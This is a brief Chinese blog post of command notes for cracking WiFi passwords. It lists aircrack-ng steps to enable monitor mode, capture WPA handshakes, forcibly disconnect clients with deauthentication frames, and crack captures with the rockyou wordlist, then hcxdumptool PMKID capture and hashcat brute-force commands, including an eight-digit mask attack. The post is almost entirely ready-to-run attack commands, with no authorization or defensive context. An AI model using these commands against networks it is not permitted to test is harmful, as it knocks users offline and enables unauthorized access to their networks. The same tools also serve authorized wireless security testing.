wifi工具使用

wifi工具使用

1.aircrack-ng

iwconfig                         #查看无线网卡
sudo airmon-ng                   #查看网卡是否支持监听模式
sudo airmon-ng check kill        #结束系统中可能的干扰进程
sudo airmon-ng start wlan0       #开启监听模式
sudo airodump-ng wlan0mon        #监听周围WIFI状态
sudo airodump-ng -c CH值 --bssid MAC值 -w 保存文件名 wlan0mon    #抓取握手包
sudo aireplay-ng -0 2 -c 客户MAC值 -a MAC值 wlan0mon            #强断
sudo aircrack-ng -w 字典名 .cap文件名
gzip -d /usr/share/wordlists/rockyou.txt.gz #解压kali自带的rockyou字典


airodump-ng --band abg wlan0  扫描5g和2.4g

airodump-ng -c 161信道  --bssid AP_MAC值 --ivszufang保存文件名称  wlan0

aireplay-ng -0 2 -c xx:xx:xx:xx:xx:xx(客户端mac 不写此选项默认所有客户端) -a AP_MAC值 wlan0 -D

1.1 抓到的包转hashcat爆破

aircrack-ng out.cap -j out       # 转换hccapx
hashcat -m 2500 testap.hccapx pass.txt      # 爆破

2.hcxdumptool(这种不需要抓取握手包)

环境: kali
网卡: 磊科(netcore)NW392千兆5G双频USB无线网卡
1. 网卡驱动安装(rtl8812au驱动安装)  apt-get update && apt install realtek-rtl88xxau-dkms
2. 命令如下
    sudo systemctl stop NetworkManager.service             //关闭网络服务
    sudo systemctl stop wpa_supplicant.service
    airmon-ng stop wlan0 && airmon-ng start wlan0

    hcxdumptool -i wlan0 -o Hackers-ArisePMKID --enable_status=1

3. 抓包结束
    sudo systemctl start wpa_supplicant.service           //恢复网络服务
    sudo systemctl start NetworkManager.service
    hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng       //导出hashcat识别的爆破文件

4. hashcat -m 22000 hash.hc22000 wordlist.txt -o find_pwd.txt(找到的密码输出)
   hashcat.exe -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
posted @ 2022-11-20 14:11  是谁走漏了消息  阅读(187)  评论(0编辑  收藏  举报